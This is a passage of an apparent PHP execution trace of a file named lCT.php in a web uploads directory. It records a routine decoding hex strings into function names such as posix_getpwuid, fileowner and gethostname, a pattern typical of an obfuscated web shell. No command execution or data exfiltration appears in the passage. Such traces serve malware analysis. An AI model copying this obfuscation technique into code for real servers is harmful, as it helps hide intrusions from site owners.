3	670	1	0.026131	721080
3	670	R			120
3	671	0	0.026143	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	671	1	0.026154	721040
3	671	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	672	0	0.026184	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	672	1	0.026195	721080
3	672	R			95
3	673	0	0.026208	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	673	1	0.026219	721040
3	673	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	674	0	0.026250	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	674	1	0.026261	721080
3	674	R			103
3	675	0	0.026273	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	675	1	0.026285	721040
3	675	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	676	0	0.026314	721032	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	676	1	0.026325	721080
3	676	R			101
3	677	0	0.026337	721000	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	677	1	0.026348	721040
3	677	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	678	0	0.026384	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	678	1	0.026396	721088
3	678	R			116
3	679	0	0.026409	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	679	1	0.026420	721048
3	679	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	680	0	0.026450	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	680	1	0.026461	721088
3	680	R			112
3	681	0	0.026473	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	681	1	0.026484	721048
3	681	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	682	0	0.026514	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'77'
3	682	1	0.026525	721088
3	682	R			119
3	683	0	0.026537	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	119
3	683	1	0.026547	721048
3	683	R			'w'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	684	0	0.026576	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	684	1	0.026587	721088
3	684	R			117
3	685	0	0.026599	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	685	1	0.026610	721048
3	685	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	686	0	0.026640	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	686	1	0.026651	721088
3	686	R			105
3	687	0	0.026663	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	687	1	0.026674	721048
3	687	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	688	0	0.026703	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	688	1	0.026714	721088
3	688	R			100
3	689	0	0.026726	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	689	1	0.026737	721048
3	689	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	661	1	0.026766	721008
2	661	R			'posix_getpwuid'
1		A						/var/www/html/uploads/lCT.php	7	$func[33] = 'posix_getpwuid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	690	0	0.026801	721008	dehex	1		/var/www/html/uploads/lCT.php	7	1	'706f7369785f6765746772676964'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 27
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	691	0	0.026845	721040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	691	1	0.026857	721088
3	691	R			112
3	692	0	0.026869	721008	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	692	1	0.026881	721048
3	692	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	693	0	0.026911	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	693	1	0.026922	721120
3	693	R			111
3	694	0	0.026934	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	694	1	0.026946	721080
3	694	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	695	0	0.026976	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	695	1	0.026987	721120
3	695	R			115
3	696	0	0.026999	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	696	1	0.027010	721080
3	696	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	697	0	0.027040	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	697	1	0.027051	721120
3	697	R			105
3	698	0	0.027064	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	698	1	0.027075	721080
3	698	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	699	0	0.027105	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	699	1	0.027116	721120
3	699	R			120
3	700	0	0.027128	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	700	1	0.027138	721080
3	700	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	701	0	0.027168	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	701	1	0.027179	721120
3	701	R			95
3	702	0	0.027191	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	702	1	0.027202	721080
3	702	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	703	0	0.027233	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	703	1	0.027244	721120
3	703	R			103
3	704	0	0.027256	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	704	1	0.027267	721080
3	704	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	705	0	0.027296	721072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	705	1	0.027307	721120
3	705	R			101
3	706	0	0.027319	721040	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	706	1	0.027331	721080
3	706	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	707	0	0.027360	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	707	1	0.027371	721128
3	707	R			116
3	708	0	0.027383	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	708	1	0.027395	721088
3	708	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	709	0	0.027424	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	709	1	0.027435	721128
3	709	R			103
3	710	0	0.027447	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	710	1	0.027457	721088
3	710	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	711	0	0.027487	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	711	1	0.027498	721128
3	711	R			114
3	712	0	0.027510	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	712	1	0.027527	721088
3	712	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	713	0	0.027557	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	713	1	0.027569	721128
3	713	R			103
3	714	0	0.027581	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	714	1	0.027592	721088
3	714	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	715	0	0.027621	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	715	1	0.027633	721128
3	715	R			105
3	716	0	0.027646	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	716	1	0.027657	721088
3	716	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	717	0	0.027686	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	717	1	0.027697	721128
3	717	R			100
3	718	0	0.027709	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	718	1	0.027721	721088
3	718	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	690	1	0.027750	721048
2	690	R			'posix_getgrgid'
1		A						/var/www/html/uploads/lCT.php	7	$func[34] = 'posix_getgrgid'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	719	0	0.027785	721048	dehex	1		/var/www/html/uploads/lCT.php	7	1	'70617468696e666f'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	720	0	0.027826	721080	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	720	1	0.027837	721128
3	720	R			112
3	721	0	0.027850	721048	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	721	1	0.027861	721088
3	721	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	722	0	0.027892	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	722	1	0.027903	721160
3	722	R			97
3	723	0	0.027916	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	723	1	0.027927	721120
3	723	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	724	0	0.027966	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	724	1	0.027978	721160
3	724	R			116
3	725	0	0.027990	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	725	1	0.028001	721120
3	725	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	726	0	0.028032	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	726	1	0.028043	721160
3	726	R			104
3	727	0	0.028055	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	727	1	0.028066	721120
3	727	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	728	0	0.028095	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	728	1	0.028107	721160
3	728	R			105
3	729	0	0.028119	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	729	1	0.028130	721120
3	729	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	730	0	0.028160	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	730	1	0.028171	721160
3	730	R			110
3	731	0	0.028183	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	731	1	0.028194	721120
3	731	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	732	0	0.028224	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	732	1	0.028236	721160
3	732	R			102
3	733	0	0.028248	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	733	1	0.028259	721120
3	733	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	734	0	0.028292	721112	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	734	1	0.028304	721160
3	734	R			111
3	735	0	0.028316	721080	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	735	1	0.028327	721120
3	735	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	719	1	0.028357	721088
2	719	R			'pathinfo'
1		A						/var/www/html/uploads/lCT.php	7	$func[35] = 'pathinfo'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	736	0	0.028391	721088	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c656f776e6572'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	737	0	0.028431	721120	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	737	1	0.028443	721168
3	737	R			102
3	738	0	0.028455	721088	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	738	1	0.028467	721128
3	738	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	739	0	0.028496	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	739	1	0.028508	721200
3	739	R			105
3	740	0	0.028520	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	740	1	0.028531	721160
3	740	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	741	0	0.028561	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	741	1	0.028572	721200
3	741	R			108
3	742	0	0.028584	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	742	1	0.028595	721160
3	742	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	743	0	0.028625	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	743	1	0.028636	721200
3	743	R			101
3	744	0	0.028648	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	744	1	0.028659	721160
3	744	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	745	0	0.028689	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	745	1	0.028700	721200
3	745	R			111
3	746	0	0.028712	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	746	1	0.028723	721160
3	746	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	747	0	0.028753	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'77'
3	747	1	0.028764	721200
3	747	R			119
3	748	0	0.028776	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	119
3	748	1	0.028787	721160
3	748	R			'w'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	749	0	0.028816	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	749	1	0.028827	721200
3	749	R			110
3	750	0	0.028839	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	750	1	0.028850	721160
3	750	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	751	0	0.028880	721152	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	751	1	0.028892	721200
3	751	R			101
3	752	0	0.028904	721120	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	752	1	0.028914	721160
3	752	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	753	0	0.028944	721160	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	753	1	0.028954	721208
3	753	R			114
3	754	0	0.028967	721128	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	754	1	0.028978	721168
3	754	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	736	1	0.029012	721128
2	736	R			'fileowner'
1		A						/var/www/html/uploads/lCT.php	7	$func[36] = 'fileowner'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	755	0	0.029046	721128	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c6567726f7570'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	756	0	0.029086	721160	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	756	1	0.029097	721208
3	756	R			102
3	757	0	0.029110	721128	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	757	1	0.029121	721168
3	757	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	758	0	0.029153	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	758	1	0.029166	721240
3	758	R			105
3	759	0	0.029203	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	759	1	0.029216	721200
3	759	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	760	0	0.029246	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	760	1	0.029257	721240
3	760	R			108
3	761	0	0.029269	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	761	1	0.029281	721200
3	761	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	762	0	0.029311	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	762	1	0.029322	721240
3	762	R			101
3	763	0	0.029334	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	763	1	0.029345	721200
3	763	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	764	0	0.029375	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	764	1	0.029386	721240
3	764	R			103
3	765	0	0.029398	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	765	1	0.029409	721200
3	765	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	766	0	0.029438	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	766	1	0.029449	721240
3	766	R			114
3	767	0	0.029461	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	767	1	0.029472	721200
3	767	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	768	0	0.029502	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	768	1	0.029513	721240
3	768	R			111
3	769	0	0.029526	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	769	1	0.029537	721200
3	769	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	770	0	0.029567	721192	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	770	1	0.029578	721240
3	770	R			117
3	771	0	0.029590	721160	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	771	1	0.029601	721200
3	771	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	772	0	0.029630	721200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	772	1	0.029642	721248
3	772	R			112
3	773	0	0.029654	721168	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	773	1	0.029666	721208
3	773	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	755	1	0.029695	721168
2	755	R			'filegroup'
1		A						/var/www/html/uploads/lCT.php	7	$func[37] = 'filegroup'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	774	0	0.029730	721168	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c6574797065'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	775	0	0.029774	721200	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	775	1	0.029785	721248
3	775	R			102
3	776	0	0.029798	721168	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	776	1	0.029809	721208
3	776	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	777	0	0.029839	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	777	1	0.029850	721280
3	777	R			105
3	778	0	0.029863	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	778	1	0.029874	721240
3	778	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	779	0	0.029904	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	779	1	0.029915	721280
3	779	R			108
3	780	0	0.029927	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	780	1	0.029938	721240
3	780	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	781	0	0.029967	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	781	1	0.029978	721280
3	781	R			101
3	782	0	0.029991	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	782	1	0.030002	721240
3	782	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	783	0	0.030032	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	783	1	0.030043	721280
3	783	R			116
3	784	0	0.030055	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	784	1	0.030067	721240
3	784	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	785	0	0.030097	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	785	1	0.030108	721280
3	785	R			121
3	786	0	0.030120	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	786	1	0.030131	721240
3	786	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	787	0	0.030160	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	787	1	0.030172	721280
3	787	R			112
3	788	0	0.030184	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	788	1	0.030196	721240
3	788	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	789	0	0.030226	721232	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	789	1	0.030237	721280
3	789	R			101
3	790	0	0.030249	721200	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	790	1	0.030259	721240
3	790	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	774	1	0.030289	721208
2	774	R			'filetype'
1		A						/var/www/html/uploads/lCT.php	7	$func[38] = 'filetype'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	791	0	0.030323	721208	dehex	1		/var/www/html/uploads/lCT.php	7	1	'676574686f73746e616d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	792	0	0.030365	721240	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	792	1	0.030382	721288
3	792	R			103
3	793	0	0.030394	721208	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	793	1	0.030406	721248
3	793	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	794	0	0.030438	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	794	1	0.030449	721320
3	794	R			101
3	795	0	0.030461	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	795	1	0.030478	721280
3	795	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	796	0	0.030508	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	796	1	0.030519	721320
3	796	R			116
3	797	0	0.030531	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	797	1	0.030543	721280
3	797	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	798	0	0.030573	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	798	1	0.030584	721320
3	798	R			104
3	799	0	0.030596	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	799	1	0.030607	721280
3	799	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	800	0	0.030646	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	800	1	0.030662	721320
3	800	R			111
3	801	0	0.030679	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	801	1	0.030695	721280
3	801	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	802	0	0.030734	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	802	1	0.030746	721320
3	802	R			115
3	803	0	0.030759	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	803	1	0.030770	721280
3	803	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	804	0	0.030800	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	804	1	0.030812	721320
3	804	R			116
3	805	0	0.030830	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	805	1	0.030845	721280
3	805	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	806	0	0.030900	721272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	806	1	0.030921	721320
3	806	R			110
3	807	0	0.030947	721240	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	807	1	0.030967	721280
3	807	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	808	0	0.031029	721280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	808	1	0.031051	721328
3	808	R			97
3	809	0	0.031075	721248	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	809	1	0.031095	721288
3	809	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	810	0	0.031155	721280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	810	1	0.031176	721328
3	810	R			109
3	811	0	0.031202	721248	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	811	1	0.031225	721288
3	811	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	812	0	0.031285	721280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	812	1	0.031306	721328
3	812	R			101
3	813	0	0.031332	721248	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	813	1	0.031352	721288
3	813	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	791	1	0.031412	721248
2	791	R			'gethostname'
1		A						/var/www/html/uploads/lCT.php	7	$func[39] = 'gethostname'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	814	0	0.031482	721248	dehex	1		/var/www/html/uploads/lCT.php	7	1	'676574686f737462796e616d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
